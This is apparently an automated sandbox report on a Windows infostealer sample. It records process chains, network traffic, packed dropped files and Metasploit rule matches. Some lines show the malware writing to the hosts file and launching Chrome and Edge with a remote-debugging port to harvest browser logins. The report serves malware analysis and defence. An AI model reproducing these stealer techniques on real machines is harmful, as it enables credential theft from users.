                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                        Source: unknown, HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49704 version: TLS 1.2
                        Source: unknown, HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49707 version: TLS 1.2
                        Source: unknown, HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49829 version: TLS 1.2
                        Source: unknown, HTTPS traffic detected: 116.203.0.159:443 -> 192.168.2.5:49836 version: TLS 1.2
                        Source: unknown, HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49913 version: TLS 1.2
                        Source: unknown, HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:50137 version: TLS 1.2
                        Source: unknown, HTTPS traffic detected: 3.5.30.241:443 -> 192.168.2.5:50138 version: TLS 1.2
                        Source: unknown, HTTPS traffic detected: 51.105.71.136:443 -> 192.168.2.5:50155 version: TLS 1.2
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, Code function: 3_2_02A13BB1 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow
                        Source: S0FTWARE.exe, 00000000.00000002.2229780239.000000000107A000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: tGC (fractional)Gateway TimeoutGdiplusShutdownGetActiveObjectGetActiveWindowGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetDpiForWindowGetEnhMetaFileWGetGuildInvitesGetGuildPreviewGetGuildStickerGetModuleHandleGetMonitorInfoWGetProcessTimesGetRawInputDataGetSecurityInfoGetStartupInfoWGetTextMetricsWGetThreadLocaleGetThreadMemberGot version 2 !GreaterGreater;Group: bad kindHanifi_RohingyaHeatReducedTempHitachi SH3 DSPHorizontalLine;HotWaterOutTempIdempotency-KeyImpersonateSelfImportEntrySizeIndonesian (id)InsertMenuItemWInvalidArgumentInvisibleComma;InvisibleTimes;IsWindowEnabledIsWindowUnicodeIsWindowVisibleIsWow64Process2IsolationLevel(Jan _2 15:04:05Konsep skenarioLeftDownVector;LeftRightArrow;Leftrightarrow;Length RequiredLessSlantEqual;LessThanOrEqualListGuildEmojisLithuanian (lt)LoadLibraryExAmemstr_ed804826-3

                        Spam, unwanted Advertisements and Ransom Demands

                        Source: C:\ProgramData\AAFIJKKEHJ.exe, File written: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, Code function: 3_2_02A08DEA _memset,wsprintfA,OpenDesktopA,CreateDesktopA,_memset,lstrcat,lstrcat,lstrcat,_memset,lstrcpy,_memset,CreateProcessA,Sleep,CloseDesktop

                        System Summary

                        Source: 00000000.00000002.2247474253.0000000013A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Metasploit Payloads - file msf.war - contents, Author: Florian Roth
                        Source: 00000000.00000002.2246493920.00000000133E8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Metasploit Payloads - file msf.war - contents, Author: Florian Roth
                        Source: 00000000.00000003.2192615630.00000000133E8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Metasploit Payloads - file msf.war - contents, Author: Florian Roth
                        Source: AAFIJKKEHJ.exe.3.dr, Static PE information: section name: .vmp$ (listed 3 times)
                        Source: NewApp[1].exe.3.dr, Static PE information: section name: .vmp$ (listed 3 times)
                        Source: GHDAKKJJJK.exe.3.dr, Static PE information: section name: .vmp$ (listed 3 times)
                        Source: Updater[1].exe.3.dr, Static PE information: section name: .vmp$ (listed 3 times)
                        Source: Updater.exe.20.dr, Static PE information: section name: .vmp$ (listed 3 times)
                        Source: service.exe.54.dr, Static PE information: section name: .vmp$ (listed 3 times)
                        Source: C:\ProgramData\AAFIJKKEHJ.exe, Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, Code function: 3_2_02A0144B GetCurrentProcess,NtQueryInformationProcess
                        Source: C:\ProgramData\AAFIJKKEHJ.exe, Code function: 20_2_00007FF6AD6D1394 NtCancelTimer2
                        Source: C:\Windows\System32\svchost.exe, File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6344203_2_6C634420
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C65A4303_2_6C65A430
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6164D03_2_6C6164D0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C66A4D03_2_6C66A4D0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6FA4803_2_6C6FA480
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6325603_2_6C632560
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6705703_2_6C670570
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C7185503_2_6C718550
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6285403_2_6C628540
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6D45403_2_6C6D4540
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C69A5E03_2_6C69A5E0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C65E5F03_2_6C65E5F0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5C45B03_2_6C5C45B0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C62C6503_2_6C62C650
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C62E6E03_2_6C62E6E0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C66E6E03_2_6C66E6E0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5F46D03_2_6C5F46D0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6507003_2_6C650700
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5FA7D03_2_6C5FA7D0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C61E0703_2_6C61E070
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C69C0003_2_6C69C000
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6980103_2_6C698010
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5C80903_2_6C5C8090
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6AC0B03_2_6C6AC0B0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5E00B03_2_6C5E00B0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6381403_2_6C638140
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6461303_2_6C646130
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6B41303_2_6C6B4130
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5D01E03_2_6C5D01E0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6582603_2_6C658260
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6682503_2_6C668250
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6A82203_2_6C6A8220
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C69A2103_2_6C69A210
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C7562C03_2_6C7562C0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6A22A03_2_6C6A22A0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C69E2B03_2_6C69E2B0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C7123703_2_6C712370
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6EC3603_2_6C6EC360
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6663703_2_6C666370
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5D83403_2_6C5D8340
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5D23703_2_6C5D2370
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6423203_2_6C642320
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6243E03_2_6C6243E0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6023A03_2_6C6023A0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C62E3B03_2_6C62E3B0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5D3C403_2_6C5D3C40
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6F9C403_2_6C6F9C40
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C5E1C303_2_6C5E1C30
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C691CE03_2_6C691CE0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C70DCD03_2_6C70DCD0
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C633D003_2_6C633D00
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C6A1DC03_2_6C6A1DC0
                        Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                        Source: C:\ProgramData\AAFIJKKEHJ.exeCode function: String function: 00007FF6AD6D1394 appears 33 times
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02A0470C appears 287 times
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 6C5F3620 appears 61 times
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 6C5F9B10 appears 70 times
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02A12143 appears 34 times
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 02A12265 appears 73 times
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 6C709F30 appears 31 times
                        Source: GHDAKKJJJK.exe.3.drStatic PE information: Number of sections : 12 > 10
                        Source: service.exe.54.drStatic PE information: Number of sections : 12 > 10
                        Source: AAFIJKKEHJ.exe.3.drStatic PE information: Number of sections : 11 > 10
                        Source: Updater.exe.20.drStatic PE information: Number of sections : 11 > 10
                        Source: NewApp[1].exe.3.drStatic PE information: Number of sections : 11 > 10
                        Source: Updater[1].exe.3.drStatic PE information: Number of sections : 12 > 10
                        Source: softokn3.dll.3.drStatic PE information: No import functions for PE file found
                        Source: softokn3.dll.3.drStatic PE information: Data appended to the last section found
                        Source: S0FTWARE.exe, 00000000.00000002.2234220755.0000000001E65000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs S0FTWARE.exe
                        Source: S0FTWARE.exe, 00000000.00000002.2242921904.0000000012CB6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs S0FTWARE.exe
                        Source: S0FTWARE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                        Source: 00000000.00000002.2247474253.0000000013A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                        Source: 00000000.00000002.2246493920.00000000133E8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                        Source: 00000000.00000003.2192615630.00000000133E8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                        Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@138/236@36/31
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C630300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,3_2_6C630300
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A142EE __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_02A142EE
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_02A133B3 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z,__EH_prolog3_catch,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,3_2_02A133B3
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\8VPLTWOR.htmJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2748:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3408:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1124:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2664:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3148:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4836:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_03
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                        Source: S0FTWARE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\S0FTWARE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\ProgramData\AAFIJKKEHJ.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: chrome.exe, 00000005.00000002.2733717491.000007C00061E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                        Source: BitLockerToGo.exe, 00000003.00000003.2727196812.0000000002F17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: BitLockerToGo.exe, 00000003.00000002.3372636237.000000002FE4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: BitLockerToGo.exe, 00000003.00000002.3361275662.0000000017C66000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3363909845.000000001DBD8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: S0FTWARE.exeReversingLabs: Detection: 28%
                        Source: C:\Users\user\Desktop\S0FTWARE.exeFile read: C:\Users\user\Desktop\S0FTWARE.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\S0FTWARE.exe "C:\Users\user\Desktop\S0FTWARE.exe"
                        Source: C:\Users\user\Desktop\S0FTWARE.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2324,i,17997273353640924679,7727149592954305312,262144 /prefetch:8
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                        Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2600,i,17974872305379590479,9492562084942244494,262144 /prefetch:3
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2728 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:3
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
